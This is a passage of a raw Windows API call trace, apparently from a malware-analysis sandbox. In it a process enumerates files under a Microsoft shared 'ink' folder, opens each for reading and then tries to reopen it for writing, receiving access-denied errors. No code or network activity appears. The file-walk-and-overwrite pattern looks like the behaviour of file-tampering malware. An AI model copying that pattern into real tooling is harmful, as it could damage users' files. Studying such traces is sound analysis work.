(HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0083.959] AreFileApisANSI () returned 1 [0083.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0083.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0083.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml") returned 77 [0083.959] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.959] GetFileType (hFile=0x42c) returned 0x1 [0083.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.959] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.959] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.959] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.960] CloseHandle (hObject=0x42c) returned 1 [0083.960] AreFileApisANSI () returned 1 [0083.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0083.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0083.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml") returned 77 [0083.960] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.960] GetLastError () returned 0x5 [0083.960] GetLastError () returned 0x5 [0083.960] SetLastError (dwErrCode=0x5) [0083.960] GetLastError () returned 0x5 [0083.960] SetLastError (dwErrCode=0x5) [0083.960] GetLastError () returned 0x5 [0083.960] SetLastError (dwErrCode=0x5) [0083.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0083.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.960] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x98, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x5f010, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x98, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ɏ")) returned 0 [0083.960] FindClose (in: hFindFile=0x780d0 | out: hFindFile=0x780d0) returned 1 [0083.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0083.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0083.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0083.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0083.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0083.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0083.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0083.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0083.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0083.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0083.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0083.962] AreFileApisANSI () returned 1 [0083.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL", lpUsedDefaultChar=0x0) returned 57 [0083.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0083.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0083.962] AreFileApisANSI () returned 1 [0083.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0083.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0083.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL") returned 57 [0083.962] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.963] GetLastError () returned 0x5 [0083.963] GetLastError () returned 0x5 [0083.963] SetLastError (dwErrCode=0x5) [0083.963] GetLastError () returned 0x5 [0083.963] SetLastError (dwErrCode=0x5) [0083.963] GetLastError () returned 0x5 [0083.963] SetLastError (dwErrCode=0x5) [0083.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0083.963] AreFileApisANSI () returned 1 [0083.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0083.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0083.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL") returned 57 [0083.963] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.963] GetLastError () returned 0x5 [0083.963] GetLastError () returned 0x5 [0083.963] SetLastError (dwErrCode=0x5) [0083.963] GetLastError () returned 0x5 [0083.963] SetLastError (dwErrCode=0x5) [0083.963] GetLastError () returned 0x5 [0083.963] SetLastError (dwErrCode=0x5) [0083.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0083.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0083.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0083.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0083.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0083.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0083.964] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cfce2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0083.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0083.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0083.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0083.964] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x781d0 [0083.964] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf9a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.964] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c3a52f7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3c3a52f7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3c3a52f7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0083.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0083.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0083.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0083.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46908 [0083.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0083.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0083.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0083.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0083.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0083.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0083.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0083.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0083.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0083.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0083.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.965] AreFileApisANSI () returned 1 [0083.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0083.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0083.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0083.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.965] AreFileApisANSI () returned 1 [0083.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0083.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x851c0 [0083.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui") returned 73 [0083.966] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.966] GetFileType (hFile=0x42c) returned 0x1 [0083.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0083.966] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.966] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.966] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.966] CloseHandle (hObject=0x42c) returned 1 [0083.967] AreFileApisANSI () returned 1 [0083.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0083.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85940 [0083.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x85940, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui") returned 73 [0083.967] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.967] GetLastError () returned 0x5 [0083.967] GetLastError () returned 0x5 [0083.967] SetLastError (dwErrCode=0x5) [0083.967] GetLastError () returned 0x5 [0083.967] SetLastError (dwErrCode=0x5) [0083.967] GetLastError () returned 0x5 [0083.967] SetLastError (dwErrCode=0x5) [0083.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85940 | out: hHeap=0x20000) returned 1 [0083.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0083.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.967] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓☀")) returned 0 [0083.967] FindClose (in: hFindFile=0x781d0 | out: hFindFile=0x781d0) returned 1 [0083.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0083.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0083.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0083.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0083.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0083.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0083.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0083.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0083.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0083.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0083.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: 